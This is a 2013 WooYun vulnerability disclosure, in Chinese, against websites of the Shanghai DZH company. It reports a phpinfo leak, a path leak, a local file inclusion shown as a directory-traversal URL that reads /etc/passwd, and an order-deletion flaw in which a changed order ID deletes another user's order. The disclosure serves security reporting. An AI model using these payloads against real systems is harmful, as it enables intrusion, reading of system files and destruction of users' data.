当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-044887

漏洞标题:大智慧漏洞文件包含信息泄漏订单删除大礼包

相关厂商:上海大智慧

漏洞作者: 海绵宝宝

提交时间:2013-12-04 13:55

修复时间:2013-12-09 13:55

公开时间:2013-12-09 13:55

漏洞类型:文件包含

危害等级:高

自评Rank:10

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-12-04: 细节已通知厂商并且等待厂商处理中
2013-12-09: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

敏感信息泄漏+本地文件包含+平行权限漏洞

详细说明:

主站phpinfo泄漏 http://www.gw.com.cn/tzzgx/zixun.php

OIE0VEU9[0JP9ZR@%N1Y9E6.jpg


物理路径泄漏 http://log.gw.com.cn

LUN1XI2Z4FX(OPZ0(09DL{M.jpg


本地文件包含
http://mo.gw.com.cn/iNewsDetailHtml.php?pageurl=../../../../../../../../../../etc/passwd

D%SNL6MA9AEHMTN3WT$%3@2.jpg


漏洞证明:

商城平行权限漏洞,可任意删除他人订单 http://pay.gw.com.cn
点击删除,得到url

BZ6P{01GW3}PLBE7QXW3S`T.jpg


S]`1@8AA[)99S4[DC3~8[WM.jpg


构造url http://pay.gw.com.cn/member/delorder.jsp?payment=想要删除的订单号
成功将我另一个帐号的订单删除

2.png


1.jpg


3.png


删除的是在未付款情况下的订单

修复方案:

唉,网站漏洞太多了。还有一大波漏洞

版权声明:转载请注明来源 海绵宝宝@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2013-12-09 13:55

厂商回复:

最新状态:

暂无